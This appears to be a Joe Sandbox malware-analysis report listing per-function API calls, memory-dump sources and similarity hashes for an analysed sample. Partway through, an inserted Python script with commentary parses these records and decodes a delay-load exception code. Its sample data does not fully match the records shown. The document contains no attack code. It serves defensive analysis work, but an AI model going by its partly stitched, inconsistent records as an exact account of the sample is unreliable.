                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: bc09f59c3f69a0425df208ba8db6cceff1f2810cc8b2fc2b879e402a43bd8f9d
                                                                                                                                                              • Instruction ID: ca895be41c0c17254ed6c8bd95f66293b42ab280464bf2485e427431a52b5f20
                                                                                                                                                              • Opcode Fuzzy Hash: bc09f59c3f69a0425df208ba8db6cceff1f2810cc8b2fc2b879e402a43bd8f9d
                                                                                                                                                              • Instruction Fuzzy Hash: 75B012AA2782017C3B0452146D82C37413CD6C0B11331861EF010F0051A8400C150233
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00A021A8,?,00000000,?,00000000,?,00A0390C,00000000,?,00000104), ref: 00A014E8
                                                                                                                                                                • Part of subcall function 00A03BD3: GetProcessHeap.KERNEL32(00000000,?,?,00A021CC,?,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03BDB
                                                                                                                                                                • Part of subcall function 00A03BD3: HeapSize.KERNEL32(00000000,?,00A021CC,?,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03BE2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3492610842-0
                                                                                                                                                              • Opcode ID: 1323b6eb8a83ba8f81dd25267634d4a7a8df24f4b978aef15eadad00f49e6853
                                                                                                                                                              • Instruction ID: 60ab92cd6025a2b34d62e034b9a4a3f8c9aab5780c596ef2d49ce570d3d2c740
                                                                                                                                                              • Opcode Fuzzy Hash: 1323b6eb8a83ba8f81dd25267634d4a7a8df24f4b978aef15eadad00f49e6853
                                                                                                                                                              • Instruction Fuzzy Hash: 4F01F97724021CABCF115E55FC80FDA77A9AF85754F114219FA165F1E1D732AC1086E0
                                                                                                                                                              APIs
                                                                                                                                                              • GetSaveFileNameW.COMDLG32(?), ref: 5BB39397
                                                                                                                                                              • memset.MSVCRT ref: 5BB393A9
                                                                                                                                                              • AllocConvertMultiSZNameToAEx.FONDUE(00000000,00000001), ref: 5BB3943A
                                                                                                                                                              • free.MSVCRT ref: 5BB395F4
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39607
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39617
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39627
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39637
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39647
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3966A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeGlobal$Name$AllocConvertFileMultiSavefreememset
                                                                                                                                                              • String ID: L
                                                                                                                                                              • API String ID: 2849690568-2909332022
                                                                                                                                                              • Opcode ID: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                              • Instruction ID: 21d808c19f2bf60455c18e43e1fa0dcd5e9bd532f6718678bc66986b2e27de0b
                                                                                                                                                              • Opcode Fuzzy Hash: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                              • Instruction Fuzzy Hash: 81B1C7B5A01208EFDB04DF94C484BEDBBB2FB48311F108159E94A9B295D7B5EAC1CF94
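The per-function records above (APIs, Memory Dump Source, Similarity with Opcode ID and API String ID) are what an analyst pivots on when comparing this sample's functions against other dumps, for instance to see that the three ___delayLoadHelper2@8 thunks share one API String ID but carry distinct Opcode IDs. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin: it reads a hand-constructed excerpt (SAMPLE, abridged from the records above in the same layout), turns each record into a dict, groups records by a chosen ID field, and decodes the C06D0057 code passed to RaiseException by the CRT delay-load helper (a VcppException value whose low word is the Win32 error). The field names, the regular expressions and the SAMPLE text are assumptions about the layout as rendered on this page.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity)
into dicts so Opcode IDs and API String IDs can be pivoted on.
Added example, not part of the report; SAMPLE is a hand-constructed excerpt."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
  • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
  • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
• Opcode ID: c8572593815b3dbc5b91917de01ad789409c5f2003d3d17c761944b03f7a17ad
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
  • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• API String ID: 1269201914-0
• Opcode ID: c36eb0da9d6a1556e8e8c8bd8ea47a8b5c875b4f512cddc82de05c43ebdf08fd
APIs
• GetSaveFileNameW.COMDLG32(?), ref: 5BB39397
• memset.MSVCRT ref: 5BB393A9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
Similarity
• API ID: FreeGlobal$Name$AllocConvertFileMultiSavefreememset
• String ID: L
• API String ID: 2849690568-2909332022
• Opcode ID: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR: "
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+): ?(?P<value>.*)$")
FACILITY_VISUALCPP = 0x6D  # facility used by VcppException() in the CRT delay-load helper

def parse_records(text):
    """One dict per function: 'apis' (call list) and 'meta' (key/value lines)."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every function record opens with its APIs header
                rec = {"apis": [], "meta": {}}
                records.append(rec)
            section = line
        elif line and rec is not None:
            body = line.lstrip("• ")
            m = API_RE.match(body) if section == "APIs" else KV_RE.match(body)
            if m and section == "APIs":
                d = m.groupdict()
                rec["apis"].append({
                    "name": d["name"], "module": d["module"], "ref": int(d["ref"], 16),
                    "args": d["args"].split(",") if d["args"] is not None else [],
                    "parent": int(d["parent"], 16) if d["parent"] else None})
            elif m:
                rec["meta"][m.group("key")] = m.group("value")
    return records

def module_base(rec):
    """Image base of the dump the function was lifted from (the 'Offset:' field)."""
    m = re.search(r"Offset: ([0-9A-F]+)", rec["meta"].get("Source File", ""))
    return int(m.group(1), 16) if m else None

def group_by(records, key):
    """Map each value of an ID field (e.g. 'API String ID') to the Opcode IDs sharing it."""
    groups = defaultdict(list)
    for rec in records:
        if rec["meta"].get(key):
            groups[rec["meta"][key]].append(rec["meta"].get("Opcode ID"))
    return dict(groups)

def raise_exception_codes(records):
    """Exception codes passed as the first argument of RaiseException, where resolved."""
    return {int(a["args"][0], 16) for rec in records for a in rec["apis"]
            if a["name"] == "RaiseException" and a["args"] and a["args"][0] != "?"}

def decode_vcpp_exception(code):
    """Split a VcppException(sev, err) code (sev | 0x6D << 16 | err) into its fields."""
    facility = (code >> 16) & 0x7FF
    return {"severity": code >> 30, "facility": facility,
            "is_vcpp": facility == FACILITY_VISUALCPP, "win32_error": code & 0xFFFF}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(hex(module_base(rec)), rec["meta"]["Opcode ID"][:12], [a["name"] for a in rec["apis"]])
    print(group_by(recs, "API String ID"))  # 1269201914-0 maps to two distinct Opcode IDs
    for code in raise_exception_codes(recs):
        print(hex(code), decode_vcpp_exception(code))  # win32_error 87, ERROR_INVALID_PARAMETER
```

Feed it the full listing by reading the report text into `parse_records` instead of SAMPLE; the `group_by` output is the cheap way to spot functions whose API String ID collides across modules (here the 00A00000 image and the module at 5BB30000), which is where to look first when deciding whether the second module is part of the sample or a library it loaded.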
                                                                                                                                                              APIs
                                                                                                                                                              • StartDocW.GDI32(?,?), ref: 5BB383C9
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB383DD
                                                                                                                                                              • memset.MSVCRT ref: 5BB383EB
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB38413
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38487
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38497
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB384A7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeGlobal$ByteCharErrorFromLastMultiStartWidememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3584426206-0
                                                                                                                                                              • Opcode ID: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                              • Instruction ID: 9d7f381b9fc1066624e1d70141abf82ecf9c865936cfe4d8509ca253bbf3e802
                                                                                                                                                              • Opcode Fuzzy Hash: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                              • Instruction Fuzzy Hash: B53106B5D00208EFDB40DFA0D888BAEB7B5FB44301F00C659E9156B290D7B5DA84DF96
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB423A7
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423B7
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423E3
                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 5BB42400
                                                                                                                                                              • RegSetValueA.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 5BB42455
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB42468
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB42478
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastValuelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2318199773-0
                                                                                                                                                              • Opcode ID: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                              • Instruction ID: 62f50d4aa6feed3817b429dc07edf9552c1dc7ce7379a4b05b1e5e0691334358
                                                                                                                                                              • Opcode Fuzzy Hash: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                              • Instruction Fuzzy Hash: E43117B1D10219EFCF00DFA4C848BAEBBB2FB08301F008959EA15A3244D3B59694FF95
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 5BB31BCB
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31C8B
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31CD6
                                                                                                                                                              • PrintDlgA.COMDLG32(00000042), ref: 5BB31D0D
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB31DA2
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB31DD5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$Printmemset
                                                                                                                                                              • String ID: B
                                                                                                                                                              • API String ID: 4070397486-1255198513
                                                                                                                                                              • Opcode ID: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                              • Instruction ID: 6afe108593f5a5b3b6ae20c4d97b56e74a9d46c06e0c05ca8afe2fec5f6e2bc5
                                                                                                                                                              • Opcode Fuzzy Hash: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                              • Instruction Fuzzy Hash: FF81B978A01209DFDB08DF55D080AAEBBB2FF88350F248159EC499B355D775EA81CB98
                                                                                                                                                              APIs
                                                                                                                                                              • _SendMessage@16.FONDUE(?,00000466,?,?), ref: 5BB38BD5
                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 5BB38BE9
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB38C12
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 5BB38C33
                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 5BB38C40
                                                                                                                                                              • _SendMessage@16.FONDUE(?,00000466,?,00000000), ref: 5BB38C5A
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 5BB38C76
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38C83
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharGlobalMessage@16MultiSendWidelstrlen$AllocFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 559837489-0
                                                                                                                                                              • Opcode ID: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                              • Instruction ID: 49e6a8a00100dc3da80ad0077e4f2cd83a2ab268223cb2c3a0b1d2a1593ad430
                                                                                                                                                              • Opcode Fuzzy Hash: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                              • Instruction Fuzzy Hash: 1631ECB5E00209BFDB04DFD8C845FBEB7B9FB48700F108159FA14A7284D6B5AA40DBA5
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB3BFB4
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFC4
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFE1
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFFE
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3C034
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3C044
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3C054
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2933462567-0
                                                                                                                                                              • Opcode ID: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                              • Instruction ID: cd61925089f64557de00c77e863698e2e42172ca2950e6fbc49bd8f366a6bcce
                                                                                                                                                              • Opcode Fuzzy Hash: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                              • Instruction Fuzzy Hash: 4D2125B5D00249EFDB01DFE0C848BAEB7B4FB04305F108569E411A7284D7FA9A84EF95
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB32B9D
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB32BAD
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideCharSize.FONDUE(00000000,?), ref: 5BB32BCC
                                                                                                                                                              • GetDateFormatA.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 5BB32BF7
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?), ref: 5BB32C1E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB32C2E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB32C3E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$From$FreeGlobal$DateErrorFormatLastSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4159601105-0
APIs
• LoadIconW.USER32(?,?), ref: 5BB387CF
• lstrlenW.KERNEL32(?), ref: 5BB387F5
• GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3880F
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 5BB3882E
• LoadIconA.USER32(?,00000000), ref: 5BB38847
• GlobalFree.KERNEL32(00000000), ref: 5BB38863
Similarity
• API ID: GlobalIconLoad$AllocByteCharFreeMultiWidelstrlen
• String ID:
• API String ID: 1819427946-0
APIs
• lstrlenW.KERNEL32(00000000), ref: 5BB44392
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB443BB
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB443DA
• CreateWindowStationA.USER32(?,?,?,?), ref: 5BB443F3
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB4440E
• GlobalFree.KERNEL32(?), ref: 5BB4441B
Similarity
• API ID: ByteCharGlobalMultiWide$AllocCreateFreeStationWindowlstrlen
• String ID:
• API String ID: 61863157-0
APIs
• lstrlenW.KERNEL32(00000000), ref: 5BB43C00
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB43C29
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB43C48
• GetKeyboardLayoutNameA.USER32(?), ref: 5BB43C55
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB43C70
• GlobalFree.KERNEL32(?), ref: 5BB43C7D
Similarity
• API ID: ByteCharGlobalMultiWide$AllocFreeKeyboardLayoutNamelstrlen
• String ID:
• API String ID: 1703440718-0
APIs
• SetLastError.KERNEL32(00000008), ref: 5BB3BBC7
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBD7
  • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBF4
• GetProfileIntA.KERNEL32(00000000,00000000,?), ref: 5BB3BC13
• GlobalFree.KERNEL32(00000000), ref: 5BB3BC26
• GlobalFree.KERNEL32(00000000), ref: 5BB3BC36
Similarity
• API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastProfile
• String ID:
• API String ID: 3090023961-0
APIs
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417C7
  • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417E4
• GlobalFree.KERNEL32(00000000), ref: 5BB4182E
• GlobalFree.KERNEL32(00000000), ref: 5BB4183E
Similarity
• API ID: ByteCharFromMultiWide$FreeGlobal
• String ID:
• API String ID: 871221524-0
APIs
• wcslen.MSVCRT ref: 5BB3A7A6
• GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A7C3
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3A7E2
• _hwrite.KERNEL32(?,?,?), ref: 5BB3A7F7
• GlobalFree.KERNEL32(?), ref: 5BB3A804
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocByteCharFreeMultiWide_hwritewcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 762335071-0
                                                                                                                                                              • Opcode ID: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                              • Instruction ID: b03e362f488cdfb2104fe771e046c6ed355965b0ed0093c9026cd7edc0c6cb8e
                                                                                                                                                              • Opcode Fuzzy Hash: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
                                                                                                                                                              • Instruction Fuzzy Hash: 7701E1B6A00209BFDB04DFD8C845FAE77B9FB48710F108159FA15A7284D6B1AA40DB65
APIs
• GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A05E
Memory Dump Source
• Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
• Instruction ID: 255683c25f877bb5b72b13642e11f88edc45d41198cb997393b3544e1fd069f6
